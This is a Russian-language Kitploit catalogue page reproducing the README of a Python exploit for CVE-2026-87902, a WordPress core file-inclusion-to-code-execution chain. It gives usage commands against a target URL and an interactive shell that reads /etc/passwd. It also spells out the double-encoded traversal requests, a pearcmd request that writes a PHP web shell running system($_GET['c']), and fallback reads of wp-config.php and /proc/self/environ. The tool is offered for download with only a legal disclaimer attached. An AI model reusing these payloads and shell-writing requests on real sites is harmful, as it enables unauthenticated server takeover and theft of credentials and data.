Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-87902 — Python-эксплойт для CVE-2026-87902, цепочки LFI-to-RCE в ядре WordPress. Определяет версии, записывает PHP-шелл через pearcmd и обеспечивает выполнение команд или резервный вариант через LFI. | Kitploit
Инструменты/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияВеб-безопасностьТестирование на ПроникновениеИнструмент Удаленного Доступа
Разработка Полезной Нагрузки
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

Python-эксплойт для CVE-2026-87902, цепочки LFI-to-RCE в ядре WordPress. Определяет версии, записывает PHP-шелл через pearcmd и обеспечивает выполнение команд или резервный вариант через LFI.

Репозиторий
113 ч 8 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2026-87902

CVE-2026-87902 – WordPress Core LFI to RCE Exploit (Auto-Forcing Edition)

maked by alfaris

⚠️ ПРАВОВОЕ ПРЕДУПРЕЖДЕНИЕ Использование против систем, которыми вы не владеете или на тестирование которых у вас нет письменного разрешения, незаконно и наказуемо в соответствии с законами о киберпреступности. Автор не несёт ответственности за неправомерное использование.


📌 Сводка уязвимости

ПолеЗначение
CVECVE-2026-87902
ТипLocal File Inclusion (LFI) → Remote Code Execution (RCE)
CWECWE-98
CVSS v3.19.2 (Критический)
Вектор атакиСетевой (без аутентификации)
ЗатронутоWordPress 4.7.0 – 7.1.1
ИсправленоWordPress 7.1.2 (и бэкпорты до 4.7.37)
Первопричинаget_page_template() не вызывает validate_file() после URL-декодирования параметра pagename, что позволяет двойному URL-кодированию обхода (%252E%252E%252F) обойти санитизацию и включить произвольные .php-файлы за пределами директории темы.

Предусловия для RCE

Для полного RCE все перечисленные условия должны быть выполнены:

  1. Версия WordPress между 4.7.0 и 7.1.1
  2. Активная тема содержит директорию верхнего уровня page-* (например, page-templates/)
  3. Существует хотя бы одна опубликованная страница
  4. pearcmd.php присутствует и доступен для чтения пользователю веб-сервера (по умолчанию в официальных Docker-образах PHP и многих установках cPanel с PHP < 8.5)
  5. В PHP включён register_argc_argv=On (по умолчанию в PHP < 8.5)
  6. ОС хоста — Linux (синтаксис обхода в Windows отличается)

Если что-либо из этого отсутствует, эксплойт переключится на чтение файлов только через LFI.


📂 Файлы

exploit.py # Основной скрипт эксплойта README.md # Этот файл report.json # (опционально) Отчёт при использовании -o

⚙️ Требования

  • Python 3.8+
  • Библиотека requests

Установка:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. Базовое сканирование (подробный вывод)
root@kitploit:~
python3 exploit.py -t https://site.com -v

Это выполнит:

· Определение версии WordPress и активной темы · Проверку диапазона уязвимых версий · Поиск ID опубликованной страницы (REST → sitemap → брутфорс) · Попытку записать PHP-шелл через pearcmd.php · Попытку включить шелл и выполнить id · Если RCE не удался, переключение на LFI по чувствительным файлам

  1. Выполнить одну команду
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. Интерактивный шелл (только если RCE удался)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

Внутри шелла:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. Сохранить отчёт в JSON
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. Комбинирование опций
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 Справочник по CLI

Флаг Длинный Описание -t --target Обязательно. URL целевого WordPress (без завершающего слэша). -c --command Выполнить одну shell-команду после RCE. -i --interactive Открыть интерактивный шелл после RCE. -v --verbose Выводить подробный прогресс. -o --output Сохранить итоговый отчёт в JSON по указанному пути. -h --help Показать справку.

🔄 Поток эксплойта

root@kitploit:~
[1] Fingerprint
      ├─ WordPress version (meta generator / asset ?ver=)
      └─ Active theme (/wp-content/themes/<name>/)

[2] Version check
      └─ 4.7.0 – 7.1.1 ? continue : warn & continue

[3] Find page ID
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ Brute force: /?page_id=1..30

[4] Check page-* directory
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] Write shell via pearcmd
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] Include shell
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] Fallback LFI (if RCE fails)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ ../.. variants
Скачать инструмент